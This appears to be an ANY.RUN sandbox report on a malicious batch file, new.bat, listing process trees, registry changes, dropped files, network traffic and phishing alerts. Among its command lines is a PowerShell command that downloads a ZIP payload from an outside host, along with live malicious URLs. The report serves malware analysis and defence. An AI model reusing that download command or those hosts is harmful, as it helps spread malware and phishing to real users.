File name: new.bat

Full analysis: https://app.any.run/tasks/dd506a97-8721-4c17-86de-5bd40fec5e3b
Verdict: Malicious activity
Analysis date: July 27, 2024, 21:05:33
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags: phishing
Indicators:
MIME: text/plain
File info: Unicode text, UTF-16, little-endian text, with very long lines (14150), with no line terminators
MD5: 2BD3CD5D43151A3DA40C26AD7A63E150
SHA1: D6F881F60F447D3E14FD81E1CE1BC660A6E6DAA9
SHA256: 83126357A369AFD90C496CBB7D0081A8B5AE4AE43EA5E7DF582B93F241677BED
SSDEEP: 384:13c9iaKYfl4T2mQvOP3ieQ9UGd2jhnhgvX:9c9iaKYfl4qmQvOP3ieQ9UGd2jhnhgvX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes the autorun value in the registry

      • reg.exe (PID: 6396)
    • PHISHING has been detected (SURICATA)

      • msedge.exe (PID: 7300)
    • Drops the executable file immediately after the start

      • powershell.exe (PID: 6524)
  • SUSPICIOUS

    • Application launched itself

      • Skype.exe (PID: 1340)
    • Uses REG/REGEDIT.EXE to modify registry

      • Skype.exe (PID: 1340)
    • Reads security settings of Internet Explorer

      • Skype.exe (PID: 1340)
    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 1896)
    • Request a resource from the Internet using PowerShell's cmdlet

      • cmd.exe (PID: 1896)
    • Downloads file from URI

      • powershell.exe (PID: 1296)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1896)
    • Detected use of alternative data streams (AltDS)

      • Skype.exe (PID: 1340)
    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 6524)
    • Connects to unusual port

      • powershell.exe (PID: 1296)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 1296)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 6524)
    • Process drops python dynamic module

      • powershell.exe (PID: 6524)
  • INFO

    • Creates files or folders in the user directory

      • Skype.exe (PID: 1340)
      • Skype.exe (PID: 4288)
      • Skype.exe (PID: 1780)
    • Reads the software policy settings

      • slui.exe (PID: 5900)
      • slui.exe (PID: 1584)
      • Skype.exe (PID: 1340)
    • Manual execution by a user

      • Skype.exe (PID: 1340)
      • mspaint.exe (PID: 6476)
      • cmd.exe (PID: 1896)
    • Reads Environment values

      • Skype.exe (PID: 1340)
      • Skype.exe (PID: 4288)
      • identity_helper.exe (PID: 8056)
    • Reads the computer name

      • Skype.exe (PID: 1340)
      • Skype.exe (PID: 5672)
      • Skype.exe (PID: 1780)
      • Skype.exe (PID: 4288)
      • identity_helper.exe (PID: 8056)
      • Skype.exe (PID: 7848)
    • Reads CPU info

      • Skype.exe (PID: 1340)
    • Checks supported languages

      • Skype.exe (PID: 5672)
      • Skype.exe (PID: 2960)
      • Skype.exe (PID: 1780)
      • Skype.exe (PID: 1340)
      • Skype.exe (PID: 4288)
      • Skype.exe (PID: 968)
      • identity_helper.exe (PID: 8056)
      • Skype.exe (PID: 7848)
    • Checks proxy server information

      • Skype.exe (PID: 1340)
      • slui.exe (PID: 1584)
      • slui.exe (PID: 5900)
      • powershell.exe (PID: 1296)
    • Reads security settings of Internet Explorer

      • notepad.exe (PID: 3688)
    • Process checks computer location settings

      • Skype.exe (PID: 1340)
      • Skype.exe (PID: 4288)
      • Skype.exe (PID: 968)
    • Create files in a temporary directory

      • Skype.exe (PID: 1340)
    • Reads the machine GUID from the registry

      • Skype.exe (PID: 1340)
    • Application launched itself

      • msedge.exe (PID: 2396)
    • Reads Microsoft Office registry keys

      • msedge.exe (PID: 2396)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 6524)
    • Disables trace logs

      • powershell.exe (PID: 1296)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.txt | Text - UTF-16 (LE) encoded (66.6)
.mp3 | MP3 audio (33.3)
No data.
All screenshots are available in the full report
Total processes: 194
Monitored processes: 60
Malicious processes: 4
Suspicious processes: 2

Behavior graph

Interactive graph, not reproduced here. Processes shown: notepad.exe, slui.exe, Skype.exe, reg.exe, conhost.exe, mspaint.exe, cmd.exe, msedge.exe (flagged #PHISHING), timeout.exe, powershell.exe, identity_helper.exe. Per-process details are available in the full report.

Process information

PID
CMD
Path
Indicators
Parent process
PID: 524
CMD: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6560 --field-trial-handle=2140,i,780710321422131241,14987600190179687934,262144 --variations-seed-version /prefetch:8
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process: msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 968
CMD: "C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe" --type=renderer --user-data-dir="C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop" --app-user-model-id=Microsoft.Skype.SkypeDesktop --app-path="C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar" --no-sandbox --no-zygote --enable-blink-features --disable-blink-features --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --ms-disable-indexeddb-transaction-timeout --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3992 --field-trial-handle=2188,i,13424211680956666148,7091152924775151219,131072 --enable-features=WinUseBrowserSpellChecker,WinUseHybridSpellChecker,WinrtGeolocationImplementation --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1
Path: C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
Parent process: Skype.exe
User:
admin
Company:
Skype Technologies S.A.
Integrity Level:
MEDIUM
Description:
Skype
Version:
8.104.0.207
Modules
Images
c:\program files (x86)\microsoft\skype for desktop\skype.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\acgenral.dll
PID: 1244
CMD: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6088 --field-trial-handle=2140,i,780710321422131241,14987600190179687934,262144 --variations-seed-version /prefetch:8
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process: msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1296
CMD: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipnng.site:4727/DXJS.zip' -OutFile 'C:\Users\admin\Downloads\DXJS.zip' }"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1340
CMD: "C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe" --share-file="C:\Users\admin\Desktop\new.bat.txt"
Path: C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
Parent process: explorer.exe
User:
admin
Company:
Skype Technologies S.A.
Integrity Level:
MEDIUM
Description:
Skype
Version:
8.104.0.207
Modules
Images
c:\program files (x86)\microsoft\skype for desktop\skype.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\acgenral.dll
PID: 1584
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 1780
CMD: "C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop" --mojo-platform-channel-handle=2460 --field-trial-handle=2188,i,13424211680956666148,7091152924775151219,131072 --enable-features=WinUseBrowserSpellChecker,WinUseHybridSpellChecker,WinrtGeolocationImplementation --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Path: C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
Parent process: Skype.exe
User:
admin
Company:
Skype Technologies S.A.
Integrity Level:
MEDIUM
Description:
Skype
Version:
8.104.0.207
Modules
Images
c:\program files (x86)\microsoft\skype for desktop\skype.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\acgenral.dll
PID: 1896
CMD: C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\new.bat.txt.bat" "
Path: C:\Windows\System32\cmd.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID: 2068
CMD: timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
Path: C:\Windows\System32\timeout.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\timeout.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID: 2396
CMD: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://vancouver-mats-describe-survival.trycloudflare.com/kyvbsa.pdf
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events: 34 513
Read events: 34 444
Write events: 50
Delete events: 19

Modification events

(PID) Process: (6396) reg.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation: write | Name: Skype for Desktop
Value: C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe

(PID) Process: (1340) Skype.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Spelling\Dictionaries
Operation: delete value | Name: en-US
Value: (empty)

(PID) Process: (1340) Skype.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Spelling\Dictionaries
Operation: delete value | Name: en
Value: (empty)

(PID) Process: (1340) Skype.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Spelling\Dictionaries
Operation: delete value | Name: _Global_
Value: (empty)

(PID) Process: (1896) cmd.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation: write | Name: SlowContextMenuEntries
Value: 6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000

(PID) Process: (1896) cmd.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation: write | Name: CachePrefix
Value: (empty)

(PID) Process: (1896) cmd.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation: write | Name: CachePrefix
Value: Cookie:

(PID) Process: (1896) cmd.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation: write | Name: CachePrefix
Value: Visited:

(PID) Process: (2396) msedge.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation: write | Name: failed_count
Value: 0

(PID) Process: (2396) msedge.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation: write | Name: state
Value: 2
Executable files: 45
Suspicious files: 106
Text files: 415
Unknown types: 0

Dropped files

PID | Process | Filename | Type
1340 | Skype.exe | C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Crashpad\settings.dat | binary
MD5: 9D0439A794AA96ABD6AFF504C86C7F31
SHA256: 5DBC3A5DAF431973E245D83AB51B128E9C4CC2F3ECD61C45C88DB161ACC25B7B
1340 | Skype.exe | C:\Users\admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic | text
MD5: F3B25701FE362EC84616A93A45CE9998
SHA256: B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
1340 | Skype.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b916037c1e115fe0.customDestinations-ms | binary
MD5: 8786405114010246400E95724DC017A4
SHA256: 0D6D2287D81B396EE757B7BEAA9F1931E7A462705CB6BFF6960174705A786587
1340 | Skype.exe | C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\LOG.old | text
MD5: 46EED8B7CAAD25F7F453617DA0FB0857
SHA256: 5BC1DE0E32F2969386351B2BE088F13B6CC3DF7693EE9E92FEEF59DB6AF1FB92
4288 | Skype.exe | C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\CS_skylib\CS_shared.conf | binary
MD5: 99914B932BD37A50B983C5E7C90AE93B
SHA256: 44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
1340 | Skype.exe | C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\settings.json | binary
MD5: 95D3A9F5B2C5989A3E6A174FB3E21820
SHA256: 5961A7DCBB98937F89DA58A47266F3E90DF340B8D255050312EB98356A006E70
1340 | Skype.exe | C:\Users\admin\AppData\Roaming\Microsoft\Spelling\en-US\default.acl | text
MD5: F3B25701FE362EC84616A93A45CE9998
SHA256: B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
4288 | Skype.exe | C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\CS_skylib\CS_shared.tmp | binary
MD5: 99914B932BD37A50B983C5E7C90AE93B
SHA256: 44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
1340 | Skype.exe | C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Partitions\e3d3a04a-060a-498e-9818-86a5809f4d73\Code Cache\wasm\index | binary
MD5: 54CB446F628B2EA4A5BCE5769910512E
SHA256: FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
1340 | Skype.exe | C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Partitions\e3d3a04a-060a-498e-9818-86a5809f4d73\Local Storage\leveldb\MANIFEST-000001 | binary
MD5: 5AF87DFD673BA2115E2FCF5CFDB727AB
SHA256: F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 51
TCP/UDP connections: 87
DNS requests: 57
Threats: 11

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
- | - | OPTIONS | 200 | 23.48.23.26:443 | https://bzib.nelreports.net/api/report?cat=bingbusiness | unknown | - | - | unknown
- | - | GET | 401 | 13.107.6.158:443 | https://business.bing.com/api/v1/user/token/microsoftgraph?&clienttype=edge-omnibox | unknown | - | - | unknown
- | - | GET | 304 | 13.107.42.16:443 | https://config.edge.skype.com/config/v1/Edge/122.0.2365.59?clientId=4489578223053569932&agents=EdgeRuntime%2CEdgeRuntimeConfig%2CEdgeDomainActions&osname=win&client=edge&channel=stable&scpfre=0&osarch=x86_64&osver=10.0.19045&wu=1&devicefamily=desktop&uma=0&sessionid=35&mngd=0&installdate=1661339457&edu=0&bphint=2&soobedate=1504771245&fg=1 | unknown | - | - | unknown
1296 | powershell.exe | GET | - | 57.128.129.21:4727 | http://trackmyshipnng.site:4727/DXJS.zip | unknown | - | - | unknown
- | - | GET | - | 20.190.160.17:443 | https://login.live.com/oauth20_authorize.srf?app_version=8.104.0.207&client_flight=ReservedFlight33,suhs&client_id=00000000480BC46C&cobrandid=6e63daac-8dfe-43f6-b70e-deacb69a89d6&display=touch&fl=phone2&lw=1&mkt=en-US&nopa=0&psi=skype&uaid=94e693f5e0084e679df65d8922024a67&coa=1&scope=service::lw.skype.com::MBI_SSL&response_type=token&redirect_uri=https%3A%2F%2Flogin.live.com%2Foauth20_desktop.srf | unknown | - | - | unknown
- | - | GET | - | 40.126.32.133:443 | https://login.live.com/oauth20_authorize.srf?app_version=8.104.0.207&client_flight=ReservedFlight33,suhs&client_id=00000000480BC46C&cobrandid=6e63daac-8dfe-43f6-b70e-deacb69a89d6&display=touch&fl=phone2&lw=1&mkt=en-US&nopa=2&psi=skype&uaid=94e693f5e0084e679df65d8922024a67&coa=1&scope=service::lw.skype.com::MBI_SSL&response_type=token&redirect_uri=https%3A%2F%2Flogin.live.com%2Foauth20_desktop.srf | unknown | - | - | unknown
- | - | GET | 304 | 204.79.197.239:443 | https://edge.microsoft.com/abusiveadblocking/api/v1/blocklist | unknown | - | - | unknown
- | - | POST | 200 | 23.48.23.51:443 | https://bzib.nelreports.net/api/report?cat=bingbusiness | unknown | text | 21 b | unknown
- | - | GET | 200 | 204.79.197.239:443 | https://edge.microsoft.com/entityextractiontemplates/api/v1/assets/find-assets?name=edge_hub_apps_manifest_gz&version=4.10.*&channel=stable&key=d414dd4f9db345fa8003e32adc81b362 | unknown | text | 266 b | unknown
- | - | POST | 200 | 104.126.37.136:443 | https://gateway.bingviz.microsoftapp.net/receive?app=skype | unknown | binary | 15 b | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
- | - | 131.253.33.254:443 | a-ring-fallback.msedge.net | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown
3952 | svchost.exe | 239.255.255.250:1900 | - | - | - | whitelisted
- | - | 104.126.37.171:443 | www.bing.com | Akamai International B.V. | DE | unknown
132 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
2796 | slui.exe | 40.91.76.224:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
6012 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
6964 | RUXIMICS.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
2432 | slui.exe | 40.91.76.224:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted

DNS requests

Domain
IP
Reputation
t-ring-fdv2.msedge.net
  • 13.107.237.254
unknown
a-ring-fallback.msedge.net
  • 131.253.33.254
unknown
www.bing.com
  • 104.126.37.171
  • 104.126.37.177
  • 104.126.37.163
  • 104.126.37.130
  • 104.126.37.145
  • 104.126.37.128
  • 104.126.37.123
  • 104.126.37.179
  • 104.126.37.186
  • 104.126.37.139
  • 104.126.37.185
  • 104.126.37.136
  • 104.126.37.178
  • 104.126.37.131
  • 104.126.37.129
  • 2.23.209.133
  • 2.23.209.149
  • 2.23.209.185
  • 2.23.209.140
  • 2.23.209.187
  • 2.23.209.130
  • 2.23.209.179
  • 2.23.209.182
  • 2.23.209.189
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
  • 4.231.128.59
whitelisted
google.com
  • 142.250.185.78
whitelisted
self.events.data.microsoft.com
  • 40.79.189.58
whitelisted
get.skype.com
  • 52.113.194.133
whitelisted
a.config.skype.com
  • 13.107.42.16
whitelisted
pipe.skype.com
  • 20.189.173.1
  • 20.189.173.11
whitelisted
b.config.skype.com
  • 13.107.42.16
whitelisted

Threats

PID | Process | Class | Message
- | - | Potential Corporate Privacy Violation | ET CHAT Skype User-Agent detected
- | - | Potential Corporate Privacy Violation | ET CHAT Skype User-Agent detected
- | - | Potential Corporate Privacy Violation | ET CHAT Skype User-Agent detected
- | - | Potential Corporate Privacy Violation | ET CHAT Skype User-Agent detected
- | - | Potential Corporate Privacy Violation | ET CHAT Skype User-Agent detected
7300 | msedge.exe | Potentially Bad Traffic | ET POLICY Observed DNS Query to Commonly Abused Cloudflare Domain (trycloudflare .com)
7300 | msedge.exe | Potentially Bad Traffic | ET POLICY Observed DNS Query to Commonly Abused Cloudflare Domain (trycloudflare .com)
7300 | msedge.exe | Possible Social Engineering Attempted | PHISHING [ANY.RUN] Cloudflare Domain Abuse for Phishing or OpenDir Purposes (RGDA)
1296 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
- | - | Potential Corporate Privacy Violation | ET CHAT Skype User-Agent detected
1 ETPRO signatures available at the full report
No debug info